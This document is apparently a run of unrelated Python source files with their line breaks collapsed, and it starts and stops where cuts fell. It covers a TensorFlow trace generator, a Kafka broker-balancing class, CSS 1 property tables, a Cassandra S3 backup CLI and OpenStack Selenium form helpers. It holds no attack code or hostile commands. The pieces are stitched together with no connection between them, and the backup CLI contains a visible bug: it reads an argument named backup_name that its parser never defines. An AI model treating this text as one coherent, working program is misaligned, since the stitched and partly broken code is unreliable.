alloc_maxes[allocator].num_bytes: alloc_maxes[allocator] = AllocationMaximum( timestamp=time, num_bytes=total_bytes, tensors=copy.deepcopy(alloc_tensor_set)) self._chrome_trace.emit_counter('Memory', allocator, self._allocators_pid, time, allocator, total_bytes) self._allocator_maximums = alloc_maxes def analyze_step_stats(self, show_dataflow=True, show_memory=True): self._allocate_pids() self._assign_lanes() self._analyze_tensors(show_memory) self._show_compute(show_dataflow) if show_memory: self._show_memory_counters() return StepStatsAnalysis( chrome_trace=self._chrome_trace, allocator_maximums=self._allocator_maximums) def generate_chrome_trace_format(self, show_dataflow=True, show_memory=True): """Produces a trace in Chrome Trace Format. Args: show_dataflow: (Optional.) If True, add flow events to the trace connecting producers and consumers of tensors. show_memory: (Optional.) If true, add object snapshot events to the trace showing the sizes and lifetimes of tensors. Returns: A JSON formatted string in Chrome Trace format. """ step_stats_analysis = self.analyze_step_stats( show_dataflow=show_dataflow, show_memory=show_memory) return step_stats_analysis.chrome_trace.format_to_string(pretty=True)
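# Example (added): a hedged usage sketch showing how this Timeline class is
# typically fed. It assumes the TF 1.x-style Session API; `fetched_op` is a
# placeholder for whatever the caller wants to run. The StepStats proto comes
# back through RunMetadata and is then rendered as a Chrome trace.
def _example_generate_trace(fetched_op):
    import tensorflow as tf   # sketch-only import; not used by this module itself
    with tf.Session() as sess:
        run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
        run_metadata = tf.RunMetadata()
        sess.run(fetched_op, options=run_options, run_metadata=run_metadata)

    tl = Timeline(run_metadata.step_stats)
    trace_json = tl.generate_chrome_trace_format(show_memory=True)
    with open('timeline.json', 'w') as f:
        f.write(trace_json)   # open this file in chrome://tracing to view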
# -*- coding: utf-8 -*- # Copyright 2016 Yelp Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging class Broker(object): """Represent a Kafka broker. A broker object contains as attributes the broker id, metadata (content of the broker node in zookeeper), partitions and replication group. """ log = logging.getLogger(__name__) def __init__(self, id, metadata=None, partitions=None): self._id = id self._metadata = metadata self._partitions = partitions or set() self._decommissioned = False self._inactive = False self._replication_group = None @property def metadata(self): return self._metadata def mark_decommissioned(self): """Mark a broker as decommissioned. Decommissioned brokers can still have partitions assigned. """ self._decommissioned = True def mark_inactive(self): """Mark a broker as inactive. Inactive brokers may not have metadata.""" self._inactive = True @property def inactive(self): return self._inactive @property def replication_group(self): return self._replication_group @replication_group.setter def replication_group(self, group): self._replication_group = group @property def decommissioned(self): return self._decommissioned @property def partitions(self): return self._partitions @property def id(self): return self._id @property def topics(self): """Return the set of topics current in broker.""" return set([partition.topic for partition in self._partitions]) @property def weight(self): """Return the total weight of all partitions on this broker.""" return sum(partition.weight for partition in self.partitions) @property def size(self): """Return the total size of all partitions on this broker.""" return sum(partition.size for partition in self.partitions) @property def leader_weight(self): return sum( partition.weight for partition in self.partitions if partition.leader == self ) def empty(self): """Return true if the broker has no replicas assigned""" return len(self.partitions) == 0 def remove_partition(self, partition): """Remove partition from partition list.""" if partition in self._partitions: # Remove partition from set self._partitions.remove(partition) # Remove broker from replica list of partition partition.replicas.remove(self) else: raise ValueError( 'Partition: {topic_id}:{partition_id} not found in broker ' '{broker_id}'.format( topic_id=partition.topic.id, partition_id=partition.partition_id, broker_id=self._id, ) ) def add_partition(self, partition): """Add partition to partition list.""" assert(partition not in self._partitions) # Add partition to existing set self._partitions.add(partition) # Add broker to replica list partition.add_replica(self) def move_partition(self, partition, broker_destination): """Move partition to destination broker and adjust replicas.""" self.remove_partition(partition) broker_destination.add_partition(partition) def count_partitions(self, topic): """Return count of partitions for given topic.""" return sum(1 for p in topic.partitions if p in self.partitions) def count_preferred_replica(self): """Return number of times broker is set 
as preferred leader.""" return sum( 1 for partition in self.partitions if partition.leader == self ) def get_preferred_partition(self, broker, sibling_distance): """The preferred partition belongs to the topic with the minimum (also negative) distance between destination and source. :param broker: Destination broker :param sibling_distance: dict {topic: distance} negative distance should mean that destination broker has got less partition of a certain topic than source self. :returns: A partition or None if no eligible partitions are available """ # Only partitions not having replica in broker are valid # Get best fit partition, based on avoiding partition from same topic # and partition with least siblings in destination-broker. eligible_partitions = self.partitions - broker.partitions if eligible_partitions: pref_partition = min( eligible_partitions, key=lambda source_partition: sibling_distance[source_partition.topic], ) return pref_partition else: return None def request_leadership(self, opt_count, skip_brokers, skip_partitions): """Under-balanced broker requests leadership from current leader, on the pretext that it recursively can maintain its leadership count as optimal. :key_terms: leader-balanced: Count of brokers as leader is at least opt-count Algorithm: ========= Step-1: Broker will request leadership from current-leader of partitions it belongs to. Step-2: Current-leaders will grant their leadership if one of these happens:- a) Either they remain leader-balanced. b) Or they will recursively request leadership from other partitions until they are become leader-balanced. If both of these conditions fail, they will revoke their leadership-grant Step-3: If current-broker becomes leader-balanced it will return otherwise it moves ahead with next partition. """ # Possible partitions which can grant leadership to broker owned_partitions = filter( lambda p: self is not p.leader and len(p.replicas) > 1, self.partitions, ) for partition in owned_partitions: # Partition not available to grant leadership when:- # 1. Broker is already under leadership change or # 2. 
Partition has already granted leadership before if partition.leader in skip_brokers or partition in skip_partitions: continue # Current broker is granted leadership temporarily prev_leader = partition.swap_leader(self) # Partition shouldn't be used again skip_partitions.append(partition) # Continue if prev-leader remains balanced if prev_leader.count_preferred_replica() >= opt_count: # If current broker is leader-balanced return else # request next-partition if self.count_preferred_replica() >= opt_count: return else: continue else: # prev-leader (broker) became unbalanced # Append skip-brokers list so that it is not unbalanced further skip_brokers.append(prev_leader) # Try recursively arrange leadership for prev-leader prev_leader.request_leadership(opt_count, skip_brokers, skip_partitions) # If prev-leader couldn't be leader-balanced # revert its previous grant to current-broker if prev_leader.count_preferred_replica() < opt_count: # Partition can be used again for rebalancing skip_partitions.remove(partition) partition.swap_leader(prev_leader) # Try requesting leadership from next partition continue else: # If prev-leader successfully balanced skip_partitions.append(partition) # Removing from skip-broker list, since it can now again be # used for granting leadership for some other partition skip_brokers.remove(prev_leader) if self.count_preferred_replica() >= opt_count: # Return if current-broker is leader-balanced return else: continue def donate_leadership(self, opt_count, skip_brokers, used_edges): """Over-loaded brokers tries to donate their leadership to one of their followers recursively until they become balanced. :key_terms: used_edges: Represent list of tuple/edges (partition, prev-leader, new-leader), which have already been used for donating leadership from prev-leader to new-leader in same partition before. skip_brokers: This is to avoid using same broker recursively for balancing to prevent loops. :Algorithm: * Over-loaded leader tries to donate its leadership to one of its followers * Follower will be tried to balanced recursively if it becomes over-balanced * If it is successful, over-loaded leader moves to next partition if required, return otherwise. * If it is unsuccessful, it tries for next-follower or next-partition whatever or returns if none available. 
""" owned_partitions = filter( lambda p: self is p.leader and len(p.replicas) > 1, self.partitions, ) for partition in owned_partitions: # Skip using same partition with broker if already used before potential_new_leaders = filter( lambda f: f not in skip_brokers, partition.followers, ) for follower in potential_new_leaders: # Don't swap the broker-pair if already swapped before # in same partition if (partition, self, follower) in used_edges: continue partition.swap_leader(follower) used_edges.append((partition, follower, self)) # new-leader didn't unbalance if follower.count_preferred_replica() <= opt_count + 1: # over-broker balanced if self.count_preferred_replica() <= opt_count + 1: return else: # Try next-partition, not another follower break else: # new-leader (broker) became over-balanced skip_brokers.append(follower) follower.donate_leadership(opt_count, skip_brokers, used_edges) # new-leader couldn't be balanced, revert if follower.count_preferred_replica() > opt_count + 1: used_edges.append((partition, follower, self)) partition.swap_leader(self) # Try next leader or partition continue else: # New-leader was successfully balanced used_edges.append((partition, follower, self)) # New-leader can be reused skip_brokers.remove(follower) if self.count_preferred_replica() <= opt_count + 1: # Now broker is balanced return else: # Try next-partition, not another follower break def __str__(self): return "{id}".format(id=self._id) def __repr__(self): return "{0}".format(self)
""" CSS 1 definitions. """ import textwrap CSS_PSEUDO_CLASS_NAMES = """first-letter first-line link active visited first-child focus hover lang before after left right first""".split() CSS_ATTR_DICT = { 'background': [ 'bottom', 'center', 'fixed', 'inherit', 'left', 'none', 'no-repeat', 'repeat', 'repeat-x', 'repeat-y', 'rgb(', 'right', 'scroll', 'top', 'transparent', 'url(', '!important', '#', ], 'background-attachment': [ 'fixed', 'inherit', 'scroll', '!important', ], 'background-color': [ 'inherit', 'rgb(', 'transparent', '!important', '#', ], 'background-image': [ 'inherit', 'none', 'url(', '!important', ], 'background-position': [ 'bottom', 'center', 'inherit', 'left', 'right', 'top', '!important', ], 'background-repeat': [ 'inherit', 'no-repeat', 'repeat', 'repeat-x', 'repeat-y', '!important', ], 'border': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-bottom': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-bottom-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'border-color': [ 'inherit', 'rgb(', 'transparent', '!important', '#', ], 'border-left': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-left-color': [ 'inherit', 'rgb(', '!important', '#', ], 'border-left-style': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'none', 'outset', 'ridge', 'solid', '!important', ], 'border-left-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'border-right': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-right-color': [ 'inherit', 'rgb(', '!important', '#', ], 'border-right-style': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'none', 'outset', 'ridge', 'solid', '!important', ], 'border-right-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'border-spacing': [ 'inherit', '!important', ], 'border-style': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'none', 'outset', 'ridge', 'solid', '!important', ], 'border-top': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-top-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'border-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'clear': [ 'both', 'inherit', 'left', 'none', 'right', '!important', ], 'color': [ 'inherit', 'rgb(', '!important', '#', ], 'display': [ 'block', 'compact', 'inherit', 'inline', 'inline-block', 'inline-table', 'list-item', 'marker', 'none', 'run-in', 'table', 'table-caption', 'table-cell', 'table-column', 'table-column-group', 'table-footer-group', 'table-header-group', 'table-row', 'table-row-group', '!important', ], 'float': [ 'inherit', 'left', 'none', 'right', '!important', ], 'font': [ '100', '200', '300', '400', '500', '600', '700', '800', '900', 'bold', 'bolder', 'caption', 'cursive', 'fantasy', 'icon', 'inherit', 'italic', 'large', 'larger', 'lighter', 'medium', 'menu', 'message-box', 'monospace', 'normal', 'oblique', 'sans-serif', 'serif', 'small', 
'smaller', 'small-caps', 'small-caption', 'status-bar', 'xx-large', 'xx-small', 'x-large', 'x-small', '!important', ], 'font-family': [ 'cursive', 'fantasy', 'inherit', 'monospace', 'sans-serif', 'serif', '!important', ], 'font-size': [ 'inherit', 'large', 'larger', 'medium', 'small', 'smaller', 'xx-large', 'xx-small', 'x-large', 'x-small', '!important', ], 'font-size-adjust': [ 'inherit', 'none', '!important', ], 'font-stretch': [ 'condensed', 'expanded', 'extra-condensed', 'extra-expanded', 'inherit', 'narrower', 'normal', 'semi-condensed', 'semi-expanded', 'ultra-condensed', 'ultra-expanded', 'wider', '!important', ], 'font-style': [ 'inherit', 'italic', 'normal', 'oblique', '!important', ], 'font-variant': [ 'inherit', 'normal', 'small-caps', '!important', ], 'font-weight': [ '100', '200', '300', '400', '500', '600', '700', '800', '900', 'bold', 'bolder', 'inherit', 'lighter', 'normal', '!important', ], 'height': [ 'auto', 'inherit', '!important', ], 'letter-spacing': [ 'inherit', 'normal', '!important', ], 'line-height': [ 'inherit', 'normal', '!important', ], 'list-style': [ 'armenian', 'circle', 'cjk-ideographic', 'decimal', 'decimal-leading-zero', 'disc', 'georgian', 'hebrew', 'hiragana', 'hiragana-iroha', 'inherit', 'inside', 'katakana', 'katakana-iroha', 'lower-alpha', 'lower-greek', 'lower-latin', 'lower-roman', 'none', 'outside', 'square', 'upper-alpha', 'upper-latin', 'upper-roman', 'url(', '!important', ], 'list-style-image': [ 'inherit', 'none', 'url(', '!important', ], 'list-style-position': [ 'inherit', 'inside', 'outside', '!important', ], 'list-style-type': [ 'armenian', 'circle', 'cjk-ideographic', 'decimal', 'decimal-leading-zero', 'disc', 'georgian', 'hebrew', 'hiragana', 'hiragana-iroha', 'inherit', 'katakana', 'katakana-iroha', 'lower-alpha', 'lower-greek', 'lower-latin', 'lower-roman', 'none', 'square', 'upper-alpha', 'upper-latin', 'upper-roman', '!important', ], 'margin': [ 'auto', 'inherit', '!important', ], 'margin-bottom': [ 'auto', 'inherit', '!important', ], 'margin-left': [ 'auto', 'inherit', '!important', ], 'margin-right': [ 'auto', 'inherit', '!important', ], 'margin-top': [ 'auto', 'inherit', '!important', ], 'padding': [ 'inherit', '!important', ], 'padding-bottom': [ 'inherit', '!important', ], 'padding-left': [ 'inherit', '!important', ], 'padding-right': [ 'inherit', '!important', ], 'padding-top': [ 'inherit', '!important', ], 'text-align': [ 'center', 'inherit', 'justify', 'left', 'right', '!important', ], 'text-decoration': [ 'blink', 'inherit', 'line-through', 'none', 'overline', 'underline', '!important', ], 'text-indent': [ 'inherit', '!important', ], 'text-transform': [ 'capitalize', 'inherit', 'lowercase', 'none', 'uppercase', '!important', ], 'vertical-align': [ 'baseline', 'bottom', 'inherit', 'middle', 'sub', 'super', 'text-bottom', 'text-top', 'top', '!important', ], 'white-space': [ 'inherit', 'normal', 'nowrap', 'pre', 'pre-wrap', 'pre-line', '!important', ], 'width': [ 'auto', 'inherit', '!important', ], 'word-spacing': [ 'inherit', 'normal', '!important', ], } CSS_PROPERTY_ATTRIBUTE_CALLTIPS_DICT = { 'background' : """Shorthand for setting the individual background properties""", 'background-attachment' : """If background image is specified, this specifies whether it is fixed with regard to the viewport ('fixed') or scrolls along with the document ('scroll').""", 'background-color' : """Sets the background color of an element, either a <color> value or the keyword 'transparent', to make the underlying colors shine through""", 
'background-image' : """Sets the background image of an element. When setting a background image, authors should also specify a background color that will be used when the image is unavailable. When the image is available, it is rendered on top of the background color""", 'background-position' : """If a background image has been specified, this property specifies its initial position""", 'background-repeat' : """If a background image is specified, this property specifies whether the image is repeated (tiled), and how""", 'border' : """Shorthand for border-width, border-style and border-color affecting all 4 borders""", 'border-bottom' : """Shorthand for border-width, border-style and border-color affecting the bottom border""", 'border-bottom-width' : """Sets the width of the bottom border of a box""", 'border-color' : """Sets the color of the four borders""", 'border-left' : """Shorthand for border-width, border-style and border-color affecting the left border""", 'border-left-width' : """Sets the width of the left border of a box""", 'border-right' : """Shorthand for border-width, border-style and border-color affecting the right border""", 'border-right-width' : """Sets the width of the right border of a box""", 'border-style' : """Specifies the line style of a box's four borders (solid, double, dashed, hidden, etc.)""", 'border-top' : """Shorthand for border-width, border-style and border-color affecting the top border""", 'border-top-width' : """Sets the width of the top border of a box""", 'border-width' : """Shorthand for setting 'border-top-width', 'border-right-width', 'border-bottom-width', and 'border-left-width' at the same place in the style sheet. If there is only one value, it applies to all sides. If there are two values, the top and bottom borders are set to the first value and the right and left are set to the second. If there are three values, the top is set to the first value, the left and right are set to the second, and the bottom is set to the third. 
If there are four values, they apply to the top, right, bottom, and left, respectively.""", 'clear' : """Indicates which sides of an element's box(es) may not be adjacent to an earlier floating box""", 'color' : """This property describes the foreground color of an element's text content""", 'display' : """How the element is to be displayed, denotes the box type format""", 'float' : """Specifies whether a box should float to the left, right, or not at all""", 'font' : """Shorthand for setting 'font-style', 'font-variant', 'font-weight', 'font-size', 'line-height', and 'font-family', at the same place in the style sheet""", 'font-family' : """Specifies a prioritized list of font family names and/or generic family names""", 'font-size' : """Describes the size of the font when set solid""", 'font-size-adjust' : """Specifies an aspect value for an element that will preserve the x-height of the first choice font in the substitute font""", 'font-stretch' : """Selects a normal, condensed, or extended face from a font family""", 'font-style' : """Sets normal (sometimes referred to as "roman" or "upright"), italic, and oblique faces within a font family""", 'font-variant' : """Can be used to select font casing 'normal' or 'small-caps'""", 'font-weight' : """Specifies the weight of the font""", 'height' : """Specifies the content height of boxes generated by block-level and replaced elements""", 'letter-spacing' : """Specifies spacing behavior between text characters""", 'line-height' : """Specifies the minimal height of each generated inline box""", 'list-style' : """Shorthand notation for setting the three properties 'list-style-type', 'list-style-image', and 'list-style-position' at the same place in the style sheet""", 'list-style-image' : """Sets the image that will be used as the list item marker""", 'list-style-position' : """Specifies the position of the marker box in the principal block box""", 'list-style-type' : """Specifies appearance of the list item marker if 'list-style-image' has the value 'none' or if the image pointed to by the URI cannot be displayed""", 'margin' : """Shorthand for setting 'margin-top', 'margin-right', 'margin-bottom', and 'margin-left' at the same place in the style sheet""", 'margin-bottom' : """Specifies the width of the bottom margin area of a box""", 'margin-left' : """Specifies the width of the left margin area of a box""", 'margin-right' : """Specifies the width of the right margin area of a box""", 'margin-top' : """Specifies the width of the top margin area of a box""", 'padding' : """Shorthand for setting 'padding-top', 'padding-right', 'padding-bottom', and 'padding-left' at the same place in the style sheet""", 'padding-bottom' : """Sets the bottom width of the containing box""", 'padding-left' : """Sets the left width of the containing box""", 'padding-right' : """Sets the right width of the containing box""", 'padding-top' : """Sets the top width of the containing box""", 'table-layout' : """Specifies the algorithm used to lay out the table cells, rows, and columns""", 'text-align' : """Specifies how inline content of a block is aligned""", 'text-decoration' : """Specifies decorations that are added to the text of an element""", 'text-indent' : """Specifies the indentation of the first line of text in a block""", 'text-transform' : """Specifies capitalization effects of an element's text""", 'uri' : """An internet reference string.""", 'vertical-align' : """Affects the vertical positioning inside a line box of the boxes generated by an inline-level 
element""", 'white-space' : """Specifies how whitespace inside the element is handled""", 'width' : """Specifies the content width of boxes generated by block-level and replaced elements""", 'word-spacing' : """Specifies spacing behavior between words""", } for property, calltip in CSS_PROPERTY_ATTRIBUTE_CALLTIPS_DICT.items(): CSS_PROPERTY_ATTRIBUTE_CALLTIPS_DICT[ property] = "\n".join(textwrap.wrap(calltip, 40))
from __future__ import (absolute_import, print_function) # From system from collections import defaultdict from fabric.api import env import logging # From package from .snapshotting import (BackupWorker, RestoreWorker, \ Snapshot, SnapshotCollection) from .utils import (add_s3_arguments, get_s3_connection_host) from .utils import base_parser as _base_parser env.use_ssh_config = True def run_backup(args): if args.user: env.user = args.user if args.password: env.password = args.password if args.sshport: env.port = args.sshport env.hosts = args.hosts.split(',') if args.new_snapshot: create_snapshot = True else: existing_snapshot = SnapshotCollection( args.aws_access_key_id, args.aws_secret_access_key, args.s3_base_path, args.s3_bucket_name ).get_snapshot_for( hosts=env.hosts, keyspaces=args.keyspaces, table=args.table ) create_snapshot = existing_snapshot is None worker = BackupWorker( aws_access_key_id=args.aws_access_key_id, aws_secret_access_key=args.aws_secret_access_key, s3_bucket_region=args.s3_bucket_region, s3_ssenc=args.s3_ssenc, s3_connection_host=get_s3_connection_host(args.s3_bucket_region), cassandra_conf_path=args.cassandra_conf_path, nodetool_path=args.nodetool_path, cassandra_bin_dir=args.cassandra_bin_dir, backup_schema=args.backup_schema, buffer_size=args.buffer_size, use_sudo=args.use_sudo, connection_pool_size=args.connection_pool_size, exclude_tables=args.exclude_tables, compress_data=args.compress_data ) if create_snapshot: logging.info("Make a new snapshot") snapshot = Snapshot( base_path=args.s3_base_path, s3_bucket=args.s3_bucket_name, hosts=env.hosts, keyspaces=args.keyspaces, table=args.table ) worker.snapshot(snapshot) else: logging.info("Add incrementals to snapshot {!s}".format( existing_snapshot)) worker.update_snapshot(existing_snapshot) def list_backups(args): snapshots = SnapshotCollection( args.aws_access_key_id, args.aws_secret_access_key, args.s3_base_path, args.s3_bucket_name ) path_snapshots = defaultdict(list) for snapshot in snapshots: base_path = '/'.join(snapshot.base_path.split('/')[:-1]) path_snapshots[base_path].append(snapshot) for path, snapshots in path_snapshots.iteritems(): print("-----------[{!s}]-----------".format(path)) for snapshot in snapshots: print("\t {!r} hosts:{!r} keyspaces:{!r} table:{!r}".format( snapshot, snapshot.hosts, snapshot.keyspaces, snapshot.table)) print("------------------------{}".format('-' * len(path))) def restore_backup(args): snapshots = SnapshotCollection( args.aws_access_key_id, args.aws_secret_access_key, args.s3_base_path, args.s3_bucket_name ) if args.snapshot_name == 'LATEST': snapshot = snapshots.get_latest() else: snapshot = snapshots.get_snapshot_by_name(args.backup_name) worker = RestoreWorker(aws_access_key_id=args.aws_access_key_id, aws_secret_access_key=args.aws_secret_access_key, snapshot=snapshot) if args.hosts: hosts = args.hosts.split(',') else: hosts = snapshot.hosts target_hosts = args.target_hosts.split(',') worker.restore(args.keyspace, args.table, hosts, target_hosts) def main(): base_parser = add_s3_arguments(_base_parser) subparsers = base_parser.add_subparsers( title='subcommands', dest='subcommand' ) subparsers.add_parser('list', help="List existing backups") backup_parser = subparsers.add_parser('backup', help="Create a snapshot") # snapshot / backup arguments backup_parser.add_argument( '--compress-data', default=False, help="Compress data, default False") backup_parser.add_argument( '--exclude-tables', default='', help="Column families you want to skip") backup_parser.add_argument( 
'--buffer-size', default=64, help="The buffer size (MB) for compress and upload") backup_parser.add_argument( '--hosts', required=True, help="The comma separated list of hosts to snapshot") backup_parser.add_argument( '--keyspaces', default='', help="The keyspaces to backup (omit to backup all)") backup_parser.add_argument( '--table', default='', help="The table (column family) to backup") backup_parser.add_argument( '--cassandra-conf-path', default='/etc/cassandra/conf/', help="cassandra config file path") backup_parser.add_argument( '--nodetool-path', default=None, help="nodetool path") backup_parser.add_argument( '--cassandra-bin-dir', default='/usr/bin', help="cassandra binaries directoryr") backup_parser.add_argument( '--user', help="The ssh user to logging on nodes") backup_parser.add_argument( '--use-sudo', default=False, help="Use sudo to run backup") backup_parser.add_argument( '--sshport', help="The ssh port to use to connect to the nodes") backup_parser.add_argument( '--password', default='', help="User password to connect with hosts") backup_parser.add_argument( '--new-snapshot', action='store_true', help="Create a new snapshot") backup_parser.add_argument( '--backup-schema', action='store_true', help="Backup (thrift) schema of selected keyspaces") backup_parser.add_argument( '--connection-pool-size', default=12, help="Number of simultaneous connections to cassandra nodes") # restore snapshot arguments restore_parser = subparsers.add_parser( 'restore', help="Restores a snapshot") restore_parser.add_argument( '--snapshot-name', default='LATEST', help="The name (date/time) \ of the snapshot (and incrementals) to restore") restore_parser.add_argument( '--keyspace', required=True, help="The keyspace to restore") restore_parser.add_argument( '--table', default='', help="The table (column family) to restore; leave blank for all") restore_parser.add_argument( '--hosts', default='', help="Comma separated list of \ hosts to restore from; leave empty for all") restore_parser.add_argument( '--target-hosts', required=True, help="The comma separated list of hosts to restore into") args = base_parser.parse_args() subcommand = args.subcommand if args.verbose: logging.basicConfig(level=logging.INFO) if subcommand == 'backup': run_backup(args) elif subcommand == 'list': list_backups(args) elif subcommand == 'restore': restore_backup(args) if __name__ == '__main__': main()
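# Example (added): a hedged sketch of driving the CLI defined above without a
# shell, by faking sys.argv before calling main(). The S3 flag spellings are
# assumed from the attribute names used in run_backup() (they are added by
# add_s3_arguments, which lives elsewhere); the bucket, base path, and hosts
# below are placeholders.
def _example_cli_backup():
    import sys
    sys.argv = [
        'cassandra-snapshotter',
        '--s3-bucket-name', 'my-backup-bucket',
        '--s3-base-path', 'prod/cluster1',
        'backup',
        '--hosts', 'cass1.example.com,cass2.example.com',
        '--new-snapshot',
    ]
    main()   # parses the fake argv, then dispatches to run_backup()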
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import contextlib import six from selenium.webdriver.common import by import selenium.webdriver.support.ui as Support from openstack_dashboard.test.integration_tests.regions import baseregion from openstack_dashboard.test.integration_tests.regions import menus class FieldFactory(baseregion.BaseRegion): """Factory for creating form field objects.""" FORM_FIELDS_TYPES = set() _element_locator_str_prefix = 'div.form-group' def __init__(self, driver, conf, src_elem=None): super(FieldFactory, self).__init__(driver, conf, src_elem) def fields(self): for field_cls in self.FORM_FIELDS_TYPES: locator = (by.By.CSS_SELECTOR, '%s %s' % (self._element_locator_str_prefix, field_cls._element_locator_str_suffix)) elements = super(FieldFactory, self)._get_elements(*locator) for element in elements: yield field_cls(self.driver, self.conf, element) @classmethod def register_field_cls(cls, field_class, base_classes=None): """Register new field class. Add new field class and remove all base classes from the set of registered classes as they should not be in. """ cls.FORM_FIELDS_TYPES.add(field_class) cls.FORM_FIELDS_TYPES -= set(base_classes) class MetaBaseFormFieldRegion(type): """Register form field class in FieldFactory.""" def __init__(cls, name, bases, dct): FieldFactory.register_field_cls(cls, bases) super(MetaBaseFormFieldRegion, cls).__init__(name, bases, dct) @six.add_metaclass(MetaBaseFormFieldRegion) class BaseFormFieldRegion(baseregion.BaseRegion): """Base class for form fields classes.""" _label_locator = None _element_locator = None @property def label(self): return self._get_element(*self._label_locator) @property def element(self): return self.src_elem @property def name(self): return self.element.get_attribute('name') def is_required(self): classes = self.driver.get_attribute('class') return 'required' in classes def is_displayed(self): return self.element.is_displayed() class CheckBoxMixin(object): @property def label(self): id_attribute = self.element.get_attribute('id') return self.element.find_element( by.By.XPATH, '../..//label[@for="{}"]'.format(id_attribute)) def is_marked(self): return self.element.is_selected() def mark(self): if not self.is_marked(): self.label.click() def unmark(self): if self.is_marked(): self.label.click() class CheckBoxFormFieldRegion(CheckBoxMixin, BaseFormFieldRegion): """Checkbox field.""" _element_locator_str_suffix = 'input[type=checkbox]' class RadioButtonFormFieldRegionNG(BaseFormFieldRegion): _element_locator_str_suffix = '[btn-radio]' @property def name(self): return self.element.get_attribute('name') or \ self.element.get_attribute('id') class ChooseFileFormFieldRegion(BaseFormFieldRegion): """Choose file field.""" _element_locator_str_suffix = 'input[type=file]' def choose(self, path): self.element.send_keys(path) class BaseTextFormFieldRegion(BaseFormFieldRegion): _element_locator = None @property def text(self): return self.element.text or self.element.get_attribute('value') @text.setter def text(self, 
text): self._fill_field_element(text, self.element) class TextInputFormFieldRegion(BaseTextFormFieldRegion): """Text input box.""" _element_locator_str_suffix = \ 'input[type=text], input[type=None]' class PasswordInputFormFieldRegion(BaseTextFormFieldRegion): """Password text input box.""" _element_locator_str_suffix = 'input[type=password]' class EmailInputFormFieldRegion(BaseTextFormFieldRegion): """Email text input box.""" _element_locator_str_suffix = 'input[type=email]' class TextAreaFormFieldRegion(BaseTextFormFieldRegion): """Multi-line text input box.""" _element_locator_str_suffix = 'textarea' class IntegerFormFieldRegion(BaseFormFieldRegion): """Integer input box.""" _element_locator_str_suffix = 'input[type=number]' @property def value(self): return self.element.get_attribute("value") @value.setter def value(self, value): self._fill_field_element(value, self.element) class SelectFormFieldRegion(BaseFormFieldRegion): """Select box field.""" _element_locator_str_suffix = 'select' def is_displayed(self): return self.element._el.is_displayed() @property def element(self): return Support.Select(self.src_elem) @property def values(self): results = [] for option in self.element.all_selected_options: results.append(option.get_attribute('value')) return results @property def options(self): results = collections.OrderedDict() for option in self.element.options: results[option.get_attribute('value')] = option.text return results @property def name(self): raw_el = self.element._el return raw_el.get_attribute('name') or raw_el.get_attribute('id') @property def text(self): return self.element.first_selected_option.text @text.setter def text(self, text): self.element.select_by_visible_text(text) @property def value(self): return self.element.first_selected_option.get_attribute('value') @value.setter def value(self, value): self.element.select_by_value(value) class BaseFormRegion(baseregion.BaseRegion): """Base class for forms.""" _submit_locator = (by.By.CSS_SELECTOR, '*.btn.btn-primary') _cancel_locator = (by.By.CSS_SELECTOR, '*.btn.cancel') _default_form_locator = (by.By.CSS_SELECTOR, 'div.modal-dialog') _fade_locator = (by.By.CLASS_NAME, 'modal-backdrop') _modal_locator = (by.By.CLASS_NAME, 'modal') def __init__(self, driver, conf, src_elem=None): """In most cases forms can be located through _default_form_locator, so specifying source element can be skipped. """ if src_elem is None: # fake self.src_elem must be set up in order self._get_element work self.src_elem = driver # bind the topmost modal form in a modal stack src_elem = self._get_elements(*self._default_form_locator)[-1] super(BaseFormRegion, self).__init__(driver, conf, src_elem) @property def _submit_element(self): return self._get_element(*self._submit_locator) def submit(self): with self.wait_till_form_disappears(): self._submit_element.click() self.wait_till_spinner_disappears() @property def _cancel_element(self): return self._get_element(*self._cancel_locator) def cancel(self): with self.wait_till_form_disappears(): self._cancel_element.click() self.wait_till_spinner_disappears() @contextlib.contextmanager def wait_till_form_disappears(self): """Wait for opened form will be disappeared after interaction. Form may be opened at page as modal or no (just a part of page). When form is modal, it should wait for form will be disappeared after submit or cancel, because form overlaps other page elements and prevents their manipulation. 
        We must be sure that exactly the currently opened form gets closed,
        because right after one modal form another modal form may be opened
        (for example on the stack page). Even if the same form is opened
        twice, the second time it is a different form with a different DOM
        id, although the DOM selector is the same. That is why element ids
        are used to detect the opened form. The idea is simple: get the
        modal-element and fade-element ids while the form is opened, and
